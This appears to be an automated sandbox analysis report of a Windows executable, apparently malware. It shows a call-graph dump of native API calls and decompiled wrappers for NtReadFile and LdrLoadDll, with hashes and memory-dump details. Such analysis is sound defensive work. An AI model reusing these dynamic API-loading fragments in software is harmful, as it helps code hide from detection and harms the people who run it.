41d3db 15155->15156 15158 419bf0 15155->15158 15159 419c16 15158->15159 15170 408b60 15159->15170 15161 419c22 15169 419c69 15161->15169 15178 40d170 15161->15178 15163 419c37 15167 419c4c 15163->15167 15226 418930 15163->15226 15166 419c5b 15168 418930 2 API calls 15166->15168 15190 40a610 15167->15190 15168->15169 15169->15156 15171 408b6d 15170->15171 15229 408ab0 15170->15229 15173 408b74 15171->15173 15241 408a50 15171->15241 15173->15161 15179 40d19c 15178->15179 15734 40a010 15179->15734 15181 40d1ae 15738 40d080 15181->15738 15184 40d1e1 15187 40d1f2 15184->15187 15189 418710 2 API calls 15184->15189 15185 40d1c9 15186 40d1d4 15185->15186 15188 418710 2 API calls 15185->15188 15186->15163 15187->15163 15188->15186 15189->15187 15191 40a635 15190->15191 15192 40a010 LdrLoadDll 15191->15192 15193 40a68c 15192->15193 15754 409c90 15193->15754 15195 40a6b2 15225 40a903 15195->15225 15763 4133a0 15195->15763 15197 40a6f7 15197->15225 15766 4079d0 15197->15766 15199 40a73b 15199->15225 15773 418780 15199->15773 15203 40a791 15204 40a798 15203->15204 15206 418290 LdrLoadDll 15203->15206 15205 41a0a0 2 API calls 15204->15205 15207 40a7a5 15205->15207 15208 40a7d5 15206->15208 15207->15166 15209 40a7e2 15208->15209 15212 40a7f2 15208->15212 15210 41a0a0 2 API calls 15209->15210 15211 40a7e9 15210->15211 15211->15166 15213 40d200 LdrLoadDll 15212->15213 15214 40a866 15213->15214 15214->15204 15215 40a871 15214->15215 15216 41a0a0 2 API calls 15215->15216 15217 40a895 15216->15217 15783 4182e0 15217->15783 15220 418290 LdrLoadDll 15221 40a8d0 15220->15221 15221->15225 15786 4180a0 15221->15786 15224 418930 2 API calls 15224->15225 15225->15166 15227 41894f ExitProcess 15226->15227 15228 4191e0 LdrLoadDll 15226->15228 15228->15227 15230 408ac3 15229->15230 15280 416e50 15229->15280 15260 416d00 15230->15260 15233 408ad6 15233->15171 15234 408acc 15234->15233 15263 419530 15234->15263 15236 408b13 15236->15233 15274 4088d0 15236->15274 15238 408b33 15284 408320 15238->15284 15240 408b45 15240->15171 15242 408a6a 15241->15242 15243 419820 LdrLoadDll 15241->15243 15717 419820 15242->15717 15243->15242 15246 419820 LdrLoadDll 15247 408a91 15246->15247 15248 40cf70 15247->15248 15249 40cf89 15248->15249 15721 409e90 15249->15721 15251 40cf9c 15725 418460 15251->15725 15255 40cfc2 15256 40cfed 15255->15256 15731 4184e0 15255->15731 15258 418710 2 API calls 15256->15258 15259 408b85 15258->15259 15259->15161 15288 418880 15260->15288 15264 419549 15263->15264 15327 413a50 15264->15327 15266 419561 15267 41956a 15266->15267 15366 419370 15266->15366 15267->15236 15269 41957e 15269->15267 15384 418180 15269->15384 15277 4088ea 15274->15277 15691 406e20 15274->15691 15276 4088f1 15276->15238 15277->15276 15704 4070e0 15277->15704 15281 416e5f 15280->15281 15282 413e50 LdrLoadDll 15281->15282 15283 416e9d 15282->15283 15283->15230 15285 408348 15284->15285 15710 409d60 15285->15710 15287 40837e 15287->15240 15289 416d15 15288->15289 15291 4191e0 15288->15291 15289->15234 15292 4191f0 15291->15292 15294 419212 15291->15294 15295 413e50 15292->15295 15294->15289 15296 413e6a 15295->15296 15297 413e5e 15295->15297 15296->15294 15297->15296 15300 4142d0 15297->15300 15305 413fd0 15300->15305 15302 4142e8 15303 413e50 LdrLoadDll 15302->15303 15304 413fbc 15302->15304 15303->15304 15304->15294 15307 413ff5 15305->15307 15306 414064 15306->15302 15307->15306 15319 409b40 15307->15319 15309 414096 15315 41413b 15309->15315 15323 41a340 15309->15323 15312 414134 15312->15315 15317 4142d0 LdrLoadDll 15312->15317 15313 4141a1 15314 4142d0 LdrLoadDll 15313->15314 15313->15315 15316 4141d3 15314->15316 15315->15302 15316->15302 15318 414197 15317->15318 15318->15302 15320 409b64 15319->15320 15321 409ba0 LdrLoadDll 15320->15321 15322 409b6b 15320->15322 15321->15322 15322->15309 15324 41a350 15323->15324 15326 4140dd 15323->15326 15325 413e50 LdrLoadDll 15324->15325 15325->15326 15326->15312 15326->15313 15326->15315 15328 413d85 15327->15328 15329 413a64 15327->15329 15328->15266 15329->15328 15390 417ed0 15329->15390 15332 413b90 15393 4185e0 15332->15393 15333 413b73 15450 4186e0 15333->15450 15336 413bb7 15338 41a0a0 2 API calls 15336->15338 15337 413b7d 15337->15266 15340 413bc3 15338->15340 15339 413d49 15342 418710 2 API calls 15339->15342 15340->15337 15340->15339 15341 413d5f 15340->15341 15346 413c52 15340->15346 15475 413790 15341->15475 15343 413d50 15342->15343 15343->15266 15345 413d72 15345->15266 15347 413cb9 15346->15347 15349 413c61 15346->15349 15347->15339 15348 413ccc 15347->15348 15466 418560 15348->15466 15351 413c66 15349->15351 15352 413c7a 15349->15352 15453 413650 15351->15453 15355 413c97 15352->15355 15356 413c7f 15352->15356 15355->15343 15408 413410 15355->15408 15396 4136f0 15356->15396 15358 413c70 15358->15266 15361 413c8d 15361->15266 15363 413caf 15363->15266 15365 413d38 15365->15266 15367 419381 15366->15367 15368 419393 15367->15368 15538 41a020 15367->15538 15368->15269 15370 4193b4 15541 413060 15370->15541 15372 419400 15372->15269 15373 4193d7 15373->15372 15374 413060 3 API calls 15373->15374 15376 4193f9 15374->15376 15376->15372 15566 414390 15376->15566 15377 41948a 15378 41949a 15377->15378 15658 419180 15377->15658 15576 418ff0 15378->15576 15381 4194c8 15655 418140 15381->15655 15385 41819c 15384->15385 15386 4191e0 LdrLoadDll 15384->15386 15387 41a0a0 15385->15387 15386->15385 15688 4188f0 15387->15688 15389 4195d9 15389->15236 15391 4191e0 LdrLoadDll 15390->15391 15392 413b44 15391->15392 15392->15332 15392->15333 15392->15337 15394 4185fc NtCreateFile 15393->15394 15395 4191e0 LdrLoadDll 15393->15395 15394->15336 15395->15394 15397 41370c 15396->15397 15398 418560 LdrLoadDll 15397->15398 15399 41372d 15398->15399 15400 413734 15399->15400 15401 413748 15399->15401 15402 418710 2 API calls 15400->15402 15403 418710 2 API calls 15401->15403 15404 41373d 15402->15404 15405 413751 15403->15405 15404->15361 15509 41a2b0 15405->15509 15407 41375c 15407->15361 15409 41345b 15408->15409 15410 41348e 15408->15410 15412 418560 LdrLoadDll 15409->15412 15411 4135d9 15410->15411 15416 4134aa 15410->15416 15414 418560 LdrLoadDll 15411->15414 15413 413476 15412->15413 15415 418710 2 API calls 15413->15415 15420 4135f4 15414->15420 15417 41347f 15415->15417 15418 418560 LdrLoadDll 15416->15418 15417->15363 15419 4134c5 15418->15419 15422 4134e1 15419->15422 15423 4134cc 15419->15423 15421 4185a0 LdrLoadDll 15420->15421 15425 41362e 15421->15425 15424 4134e6 15422->15424 15432 4134fc 15422->15432 15426 418710 2 API calls 15423->15426 15427 418710 2 API calls 15424->15427 15428 418710 2 API calls 15425->15428 15429 4134d5 15426->15429 15430 4134ef 15427->15430 15433 413639 15428->15433 15429->15363 15430->15363 15431 413501 15438 413513 15431->15438 15518 418690 15431->15518 15432->15431 15515 41a270 15432->15515 15433->15363 15436 413567 15437 41357e 15436->15437 15526 418520 15436->15526 15440 413585 15437->15440 15441 41359a 15437->15441 15438->15363 15442 418710 2 API calls 15440->15442 15443 418710 2 API calls 15441->15443 15442->15438 15444 4135a3 15443->15444 15445 4135cf 15444->15445 15521 419e70 15444->15521 15445->15363 15447 4135ba 15448 41a0a0 2 API calls 15447->15448 15449 4135c3 15448->15449 15449->15363 15451 4186fc 15450->15451 15452 4191e0 LdrLoadDll 15450->15452 15451->15337 15452->15451 15454 41368d 15453->15454 15529 418240 15453->15529 15456 413694 15454->15456 15457 4136a8 15454->15457 15459 418710 2 API calls 15456->15459 15532 418290 15457->15532 15461 41369d 15459->15461 15461->15358 15462 418710 2 API calls 15463 4136d2 15462->15463 15464 418710 2 API calls 15463->15464 15465 4136dc 15464->15465 15465->15358 15467 413d14 15466->15467 15468 4191e0 LdrLoadDll 15466->15468 15469 4185a0 15467->15469 15468->15467 15470 413d2c 15469->15470 15471 4191e0 LdrLoadDll 15469->15471 15472 418710 15470->15472 15471->15470 15473 41872c NtClose 15472->15473 15474 4191e0 LdrLoadDll 15472->15474 15473->15365 15474->15473 15476 418560 LdrLoadDll 15475->15476 15477 4137ce 15476->15477 15478 4137d7 15477->15478 15479 4137ec 15477->15479 15480 418710 2 API calls 15478->15480 15481 413810 15479->15481 15482 41385a 15479->15482 15492 4137e0 15480->15492 15535 418640 15481->15535 15483 4138a0 15482->15483 15484 41385f 15482->15484 15488 4138b2 15483->15488 15494 4139da 15483->15494 15487 418690 2 API calls 15484->15487 15484->15492 15490 41388a 15487->15490 15491 4138b7 15488->15491 15502 4138f2 15488->15502 15489 418710 2 API calls 15489->15492 15493 418710 2 API calls 15490->15493 15495 418640 LdrLoadDll 15491->15495 15492->15345 15496 413893 15493->15496 15494->15492 15498 418690 2 API calls 15494->15498 15497 4138da 15495->15497 15496->15345 15499 418710 2 API calls 15497->15499 15501 413a31 15498->15501 15503 4138e3 15499->15503 15500 418640 LdrLoadDll 15504 41391a 15500->15504 15505 418710 2 API calls 15501->15505 15502->15492 15502->15500 15503->15345 15506 418710 2 API calls 15504->15506 15507 413a3a 15505->15507 15508 413925 15506->15508 15507->15345 15508->15345 15512 4188b0 15509->15512 15511 41a2ca 15511->15407 15513 4191e0 LdrLoadDll 15512->15513 15514 4188cc RtlAllocateHeap 15513->15514 15514->15511 15516 4188b0 2 API calls 15515->15516 15517 41a288 15516->15517 15517->15431 15519 4191e0 LdrLoadDll 15518->15519 15520 4186ac NtReadFile 15519->15520 15520->15436 15522 419e94 15521->15522 15523 419e7d 15521->15523 15522->15447 15523->15522 15524 41a270 2 API calls 15523->15524 15525 419eab 15524->15525 15525->15447 15527 4191e0 LdrLoadDll 15526->15527 15528 41853c 15527->15528 15528->15437 15530 4191e0 LdrLoadDll 15529->15530 15531 41825c 15530->15531 15531->15454 15533 4191e0 LdrLoadDll 15532->15533 15534 4136c9 15532->15534 15533->15534 15534->15462 15536 4191e0 LdrLoadDll 15535->15536 15537 413835 15536->15537 15537->15489 15662 4187c0 15538->15662 15540 41a04d 15540->15370 15542 413071 15541->15542 15544 413079 15541->15544 15542->15373 15543 41334c 15543->15373 15544->15543 15665 41b250 15544->15665 15546 4130cd 15547 41b250 2 API calls 15546->15547 15551 4130d8 15547->15551 15548 413126 15550 41b250 2 API calls 15548->15550 15552 41313a 15550->15552 15551->15548 15670 41b2f0 15551->15670 15553 41b250 2 API calls 15552->15553 15555 4131ad 15553->15555 15554 41b250 2 API calls 15563 4131f5 15554->15563 15555->15554 15558 41b2b0 2 API calls 15559 41332e 15558->15559 15560 41b2b0 2 API calls 15559->15560 15561 413338 15560->15561 15562 41b2b0 2 API calls 15561->15562 15564 413342 15562->15564 15676 41b2b0 15563->15676 15565 41b2b0 2 API calls 15564->15565 15565->15543 15567 4143a1 15566->15567 15568 413a50 6 API calls 15567->15568 15570 4143b7 15568->15570 15569 41440a 15569->15377 15570->15569 15571 4143f2 15570->15571 15572 414405 15570->15572 15573 41a0a0 2 API calls 15571->15573 15574 41a0a0 2 API calls 15572->15574 15575 4143f7 15573->15575 15574->15569 15575->15377 15577 419004 15576->15577 15578 418eb0 LdrLoadDll 15576->15578 15679 418eb0 15577->15679 15578->15577 15580 41900d 15581 418eb0 LdrLoadDll 15580->15581 15582 419016 15581->15582 15583 418eb0 LdrLoadDll 15582->15583 15584 41901f 15583->15584 15585 418eb0 LdrLoadDll 15584->15585 15586 419028 15585->15586 15587 418eb0 LdrLoadDll 15586->15587 15588 419031 15587->15588 15589 418eb0 LdrLoadDll 15588->15589 15590 41903d 15589->15590 15591 418eb0 LdrLoadDll 15590->15591 15592 419046 15591->15592 15593 418eb0 LdrLoadDll 15592->15593 15594 41904f 15593->15594 15595 418eb0 LdrLoadDll 15594->15595 15596 419058 15595->15596 15597 418eb0 LdrLoadDll 15596->15597 15598 419061 15597->15598 15599 418eb0 LdrLoadDll 15598->15599 15600 41906a 15599->15600 15601 418eb0 LdrLoadDll 15600->15601 15602 419076 15601->15602 15603 418eb0 LdrLoadDll 15602->15603 15604 41907f 15603->15604 15605 418eb0 LdrLoadDll 15604->15605 15606 419088 15605->15606 15607 418eb0 LdrLoadDll 15606->15607 15608 419091 15607->15608 15609 418eb0 LdrLoadDll 15608->15609 15610 41909a 15609->15610 15611 418eb0 LdrLoadDll 15610->15611 15612 4190a3 15611->15612 15613 418eb0 LdrLoadDll 15612->15613 15614 4190af 15613->15614 15615 418eb0 LdrLoadDll 15614->15615 15616 4190b8 15615->15616 15617 418eb0 LdrLoadDll 15616->15617 15618 4190c1 15617->15618 15619 418eb0 LdrLoadDll 15618->15619 15620 4190ca 15619->15620 15621 418eb0 LdrLoadDll 15620->15621 15622 4190d3 15621->15622 15623 418eb0 LdrLoadDll 15622->15623 15624 4190dc 15623->15624 15625 418eb0 LdrLoadDll 15624->15625 15626 4190e8 15625->15626 15627 418eb0 LdrLoadDll 15626->15627 15628 4190f1 15627->15628 15629 418eb0 LdrLoadDll 15628->15629 15630 4190fa 15629->15630 15631 418eb0 LdrLoadDll 15630->15631 15632 419103 15631->15632 15633 418eb0 LdrLoadDll 15632->15633 15634 41910c 15633->15634 15635 418eb0 LdrLoadDll 15634->15635 15636 419115 15635->15636 15637 418eb0 LdrLoadDll 15636->15637 15638 419121 15637->15638 15639 418eb0 LdrLoadDll 15638->15639 15640 41912a 15639->15640 15641 418eb0 LdrLoadDll 15640->15641 15642 419133 15641->15642 15643 418eb0 LdrLoadDll 15642->15643 15644 41913c 15643->15644 15645 418eb0 LdrLoadDll 15644->15645 15646 419145 15645->15646 15647 418eb0 LdrLoadDll 15646->15647 15648 41914e 15647->15648 15649 418eb0 LdrLoadDll 15648->15649 15650 41915a 15649->15650 15651 418eb0 LdrLoadDll 15650->15651 15652 419163 15651->15652 15653 418eb0 LdrLoadDll 15652->15653 15654 41916c 15653->15654 15654->15381 15656 4191e0 LdrLoadDll 15655->15656 15657 41815c 15656->15657 15657->15269 15659 419193 15658->15659 15685 418740 15659->15685 15663 4191e0 LdrLoadDll 15662->15663 15664 4187dc NtAllocateVirtualMemory 15663->15664 15664->15540 15666 41b260 15665->15666 15667 41b266 15665->15667 15666->15546 15668 41a270 2 API calls 15667->15668 15669 41b28c 15668->15669 15669->15546 15671 41b315 15670->15671 15673 41b34d 15670->15673 15672 41a270 2 API calls 15671->15672 15674 41b32a 15672->15674 15673->15551 15675 41a0a0 2 API calls 15674->15675 15675->15673 15677 41a0a0 2 API calls 15676->15677 15678 413324 15677->15678 15678->15558 15680 418ecb 15679->15680 15681 413e50 LdrLoadDll 15680->15681 15682 418eeb 15681->15682 15683 413e50 LdrLoadDll 15682->15683 15684 418f97 15682->15684 15683->15684 15684->15580 15684->15684 15686 4191e0 LdrLoadDll 15685->15686 15687 41875c 15686->15687 15687->15378 15689 41890c RtlFreeHeap 15688->15689 15690 4191e0 LdrLoadDll 15688->15690 15689->15389 15690->15689 15692 406e30 15691->15692 15693 406e2b 15691->15693 15694 41a020 2 API calls 15692->15694 15693->15277 15701 406e55 15694->15701 15695 406eb8 15695->15277 15696 418140 LdrLoadDll 15696->15701 15697 406ebe 15699 406ee4 15697->15699 15700 418840 LdrLoadDll 15697->15700 15699->15277 15702 406ed5 15700->15702 15701->15695 15701->15696 15701->15697 15703 41a020 2 API calls 15701->15703 15707 418840 15701->15707 15702->15277 15703->15701 15705 418840 LdrLoadDll 15704->15705 15706 4070fe 15705->15706 15706->15238 15708 4191e0 LdrLoadDll 15707->15708 15709 41885c 15708->15709 15709->15701 15711 409d84 15710->15711 15714 417f10 15711->15714 15713 409dbe 15713->15287 15715 4191e0 LdrLoadDll 15714->15715 15716 417f2c 15715->15716 15716->15713 15718 419843 15717->15718 15719 409b40 LdrLoadDll 15718->15719 15720 408a7b 15719->15720 15720->15246 15723 409eb3 15721->15723 15722 409f30 15722->15251 15723->15722 15724 417f10 LdrLoadDll 15723->15724 15724->15722 15726 4191e0 LdrLoadDll 15725->15726 15727 40cfab 15726->15727 15727->15259 15728 418a50 15727->15728 15729 4191e0 LdrLoadDll 15728->15729 15730 418a6f LookupPrivilegeValueW 15729->15730 15730->15255 15732 4184fc 15731->15732 15733 4191e0 LdrLoadDll 15731->15733 15732->15256 15733->15732 15735 40a037 15734->15735 15736 409e90 LdrLoadDll 15735->15736 15737 40a066 15736->15737 15737->15181 15739 40d09a 15738->15739 15747 40d150 15738->15747 15740 409e90 LdrLoadDll 15739->15740 15741 40d0bc 15740->15741 15748 4181c0 15741->15748 15743 40d0fe 15751 418200 15743->15751 15746 418710 2 API calls 15746->15747 15747->15184 15747->15185 15749 4191e0 LdrLoadDll 15748->15749 15750 4181dc 15749->15750 15750->15743 15752 40d144 15751->15752 15753 4191e0 LdrLoadDll 15751->15753 15752->15746 15753->15752 15755 409ca1 15754->15755 15756 409c9d 15754->15756 15757 409cba 15755->15757 15758 409cec 15755->15758 15756->15195 15789 417f50 15757->15789 15759 417f50 LdrLoadDll 15758->15759 15760 409cfd 15759->15760 15760->15195 15764 40d200 LdrLoadDll 15763->15764 15765 4133c6 15763->15765 15764->15765 15765->15197 15767 4079e9 15766->15767 15793 407710 15766->15793 15769 407a0d 15767->15769 15770 407710 9 API calls 15767->15770 15769->15199 15771 4079fa 15770->15771 15771->15769 15812 40d470 15771->15812 15774 4191e0 LdrLoadDll 15773->15774 15775 40a772 15774->15775 15776 40d200 15775->15776 15777 40d21d 15776->15777 15778 418240 LdrLoadDll 15777->15778 15779 40d25e 15778->15779 15780 40d265 15779->15780 15781 418290 LdrLoadDll 15779->15781 15780->15203 15782 40d28e 15781->15782 15782->15203 15784 4191e0 LdrLoadDll 15783->15784 15785 40a8a9 15784->15785 15785->15220 15787 4191e0 LdrLoadDll 15786->15787 15788 40a8fc 15787->15788 15788->15224 15790 417f56 15789->15790 15791 4191e0 LdrLoadDll 15790->15791 15792 409cdc 15791->15792 15792->15195 15794 406e20 2 API calls 15793->15794 15810 40772a 15794->15810 15795 4079b9 15795->15767 15796 4079af 15797 4070e0 LdrLoadDll 15796->15797 15797->15795 15800 418180 LdrLoadDll 15800->15810 15802 4078b9 GetFirmwareEnvironmentVariableExW 15843 418010 15802->15843 15803 418710 LdrLoadDll NtClose 15803->15810 15805 40a910 LdrLoadDll NtClose 15805->15810 15809 4180a0 LdrLoadDll 15809->15810 15810->15795 15810->15796 15810->15800 15810->15802 15810->15803 15810->15805 15810->15809 15820 417f90 15810->15820 15823 407540 15810->15823 15835 40d350 15810->15835 15846 418040 15810->15846 15849 4180d0 15810->15849 15852 407310 15810->15852 15868 405ea0 15810->15868 15813 40d495 15812->15813 15814 407120 6 API calls 15813->15814 15816 40d4b9 15814->15816 15815 40d4c6 15815->15769 15816->15815 15817 413a50 6 API calls 15816->15817 15819 41a0a0 2 API calls 15816->15819 15956 40d2b0 15816->15956 15817->15816 15819->15816 15821 4191e0 LdrLoadDll 15820->15821 15822 417fac 15820->15822 15821->15822 15822->15810 15824 407556 15823->15824 15878 417b00 15824->15878 15826 40756f 15831 4076e1 15826->15831 15899 407120 15826->15899 15828 407655 15829 407310 7 API calls 15828->15829 15828->15831 15830 407683 15829->15830 15830->15831 15832 418180 LdrLoadDll 15830->15832 15831->15810 15833 4076b8 15832->15833 15833->15831 15834 418780 LdrLoadDll 15833->15834 15834->15831 15935 417fd0 15835->15935 15838 40d3b5 15838->15810 15841 40d3c1 15841->15810 15842 418710 2 API calls 15842->15838 15844 4191e0 LdrLoadDll 15843->15844 15845 41802c 15844->15845 15845->15810 15847 4191e0 LdrLoadDll 15846->15847 15848 41805c 15847->15848 15848->15810 15850 4191e0 LdrLoadDll 15849->15850 15851 4180ec 15850->15851 15851->15810 15853 407339 15852->15853 15941 407280 15853->15941 15856 418780 LdrLoadDll 15857 40734c 15856->15857 15857->15856 15858 4073d7 15857->15858 15860 4073d2 15857->15860 15949 40d3d0 15857->15949 15858->15810 15859 418710 2 API calls 15861 40740a 15859->15861 15860->15859 15861->15858 15862 417f90 LdrLoadDll 15861->15862 15863 40746f 15862->15863 15863->15858 15864 417fd0 LdrLoadDll 15863->15864 15865 4074d3 15864->15865 15865->15858 15866 413a50 6 API calls 15865->15866 15867 407528 15866->15867 15867->15810 15869 405eea 15868->15869 15870 417f90 LdrLoadDll 15869->15870 15871 405f04 15870->15871 15872 413e50 LdrLoadDll 15871->15872 15877 405fdc 15871->15877 15873 405f58 15872->15873 15874 409d60 LdrLoadDll 15873->15874 15875 405fb7 15874->15875 15876 413e50 LdrLoadDll 15875->15876 15876->15877 15877->15810 15879 41a270 2 API calls 15878->15879 15880 417b17 15879->15880 15906 408160 15880->15906 15882 417b32 15883 417b70 15882->15883 15884 417b59 15882->15884 15887 41a020 2 API calls 15883->15887 15885 41a0a0 2 API calls 15884->15885 15886 417b66 15885->15886 15886->15826 15888 417baa 15887->15888 15889 41a020 2 API calls 15888->15889 15890 417bc3 15889->15890 15896 417e64 15890->15896 15912 41a060 15890->15912 15893 417e50 15894 41a0a0 2 API calls 15893->15894 15895 417e5a 15894->15895 15895->15826 15897 41a0a0 2 API calls 15896->15897 15898 417eb9 15897->15898 15898->15826 15900 40721f 15899->15900 15901 407135 15899->15901 15900->15828 15901->15900 15902 413a50 6 API calls 15901->15902 15904 4071a2 15902->15904 15903 4071c9 15903->15828 15904->15903 15905 41a0a0 2 API calls 15904->15905 15905->15903 15907 408185 15906->15907 15908 409b40 LdrLoadDll 15907->15908 15909 4081b8 15908->15909 15911 4081dd 15909->15911 15915 40b340 15909->15915 15911->15882 15932 418800 15912->15932 15916 40b36c 15915->15916 15917 418460 LdrLoadDll 15916->15917 15918 40b385 15917->15918 15919 40b38c 15918->15919 15926 4184a0 15918->15926 15919->15911 15923 40b3c7 15924 418710 2 API calls 15923->15924 15925 40b3ea 15924->15925 15925->15911 15927 4191e0 LdrLoadDll 15926->15927 15928 40b3af 15927->15928 15928->15919 15929 418a90 15928->15929 15930 418aaf 15929->15930 15931 4191e0 LdrLoadDll 15929->15931 15930->15923 15931->15930 15933 4191e0 LdrLoadDll 15932->15933 15934 417e49 15933->15934 15934->15893 15934->15896 15936 40d394 15935->15936 15937 4191e0 LdrLoadDll 15935->15937 15936->15838 15938 418070 15936->15938 15937->15936 15939 4191e0 LdrLoadDll 15938->15939 15940 40d3a5 15939->15940 15940->15841 15940->15842 15942 407298 15941->15942 15943 409b40 LdrLoadDll 15942->15943 15944 4072b3 15943->15944 15945 413e50 LdrLoadDll 15944->15945 15946 4072c3 15945->15946 15947 4072cc PostThreadMessageW 15946->15947 15948 4072dc 15946->15948 15947->15948 15948->15857 15950 40d3e3 15949->15950 15953 418110 15950->15953 15954 4191e0 LdrLoadDll 15953->15954 15955 40d40e 15954->15955 15955->15857 15957 40d2c1 15956->15957 15965 418960 15957->15965 15960 40d308 15960->15816 15961 418180 LdrLoadDll 15962 40d31f 15961->15962 15962->15960 15963 418780 LdrLoadDll 15962->15963 15964 40d33e 15963->15964 15964->15816 15966 40d301 15965->15966 15967 4191e0 LdrLoadDll 15965->15967 15966->15960 15966->15961 15967->15966 18442 41b2e5 18443 41b315 18442->18443 18444 41b34d 18442->18444 18445 41a270 2 API calls 18443->18445 18446 41b32a 18445->18446 18447 41a0a0 2 API calls 18446->18447 18447->18444 18534 418283 18535 418286 18534->18535 18536 418219 18534->18536 18537 4191e0 LdrLoadDll 18535->18537 18538 4182ac 18537->18538 15989 413399 15990 40d200 LdrLoadDll 15989->15990 15991 4133c6 15989->15991 15990->15991 18577 40d2a1 18578 40d24e 18577->18578 18584 40d2a5 18577->18584 18579 40d25e 18578->18579 18580 418240 LdrLoadDll 18578->18580 18581 40d265 18579->18581 18582 418290 LdrLoadDll 18579->18582 18580->18579 18583 40d28e 18582->18583 18585 418960 LdrLoadDll 18584->18585 18586 40d301 18585->18586 18587 40d308 18586->18587 18588 418180 LdrLoadDll 18586->18588 18589 40d31f 18588->18589 18589->18587 18590 418780 LdrLoadDll 18589->18590 18591 40d33e 18590->18591 18592 408aa4 18593 416e50 LdrLoadDll 18592->18593 18594 408ac3 18593->18594 18595 416d00 LdrLoadDll 18594->18595 18597 408acc 18595->18597 18596 408ad6 18597->18596 18598 419530 7 API calls 18597->18598 18599 408b13 18598->18599 18599->18596 18600 4088d0 2 API calls 18599->18600 18601 408b33 18600->18601 18602 408320 LdrLoadDll 18601->18602 18603 408b45 18602->18603

                                                      Executed Functions

                                                      Function 00418690 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 418690-4186d9 call 4191e0 NtReadFile
                                                      C-Code - Quality: 37%
                                                      			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                      0x00418693
                                                      0x0041869f
                                                      0x004186a7
                                                      0x004186ac
                                                      0x004186b2
                                                      0x004186cd
                                                      0x004186d5
                                                      0x004186d9

                                                      APIs
                                                      • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: 1:A$r=A$r=A
                                                      • API String ID: 2738559852-4243674446
                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409B40 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 430 409b40-409b69 call 41af70 433 409b6b-409b6e 430->433 434 409b6f-409b7d call 41b390 430->434 437 409b8d-409b9e call 419720 434->437 438 409b7f-409b8a call 41b610 434->438 443 409ba0-409bb4 LdrLoadDll 437->443 444 409bb7-409bba 437->444 438->437 443->444
                                                      C-Code - Quality: 100%
                                                      			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF70(_a8,  &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B390(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B610( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419720(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                      0x00409b5c
                                                      0x00409b5f
                                                      0x00409b64
                                                      0x00409b69
                                                      0x00409b73
                                                      0x00409b78
                                                      0x00409b7b
                                                      0x00409b7d
                                                      0x00409b85
                                                      0x00409b8a
                                                      0x00409b8a
                                                      0x00409b91
                                                      0x00409b99
                                                      0x00409b9c
                                                      0x00409b9e
                                                      0x00409bb2
                                                      0x00000000
                                                      0x00409bb4
                                                      0x00409bba
                                                      0x00409b6e
                                                      0x00409b6e
                                                      0x00409b6e

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                      • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                      • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                                      Uniqueness

